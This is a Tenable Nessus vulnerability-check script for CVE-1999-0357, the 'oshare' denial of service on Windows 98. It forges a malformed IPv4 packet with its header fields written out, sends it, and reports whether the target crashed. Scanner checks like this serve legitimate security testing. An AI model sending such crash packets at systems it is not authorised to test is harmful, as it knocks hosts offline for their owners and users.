Microsoft Windows 98 Malformed oshare Packet DoS

#
# (C) Tenable Network Security, Inc.
#

# This attack is very unlikely to work from a large number
# of systems which check ip->ip_len before sending the packets.
#

include("compat.inc");

if (description)
{
 script_id(10170);
 script_version("1.26");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-1999-0357");

 script_name(english:"Microsoft Windows 98 Malformed oshare Packet DoS");
 script_summary(english:"Crashes the remote host using the 'oshare' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the remote system using the 'oshare' attack.

An attacker may use this problem to prevent your site from working
properly.");
 script_set_attribute(attribute:"solution", value:"Contact your vendor for a patch.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/01/25");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/07/29");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 1999-2019 Tenable Network Security, Inc.");
 script_family(english:"Windows");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
ip = forge_ip_packet(ip_v : 4, ip_len : 44, ip_hl : 11,
		     ip_tos : 0, ip_id : rand(), ip_off : 16383,
		     ip_ttl : 0xFF, ip_p : IPPROTO_UDP,
		     ip_src : compat::this_host());

start_denial();
send_packet(ip, pcap_active:FALSE);

alive = end_denial();
if(!alive){
		security_hole(0);
		set_kb_item(name:"Host/dead", value:TRUE);
	  }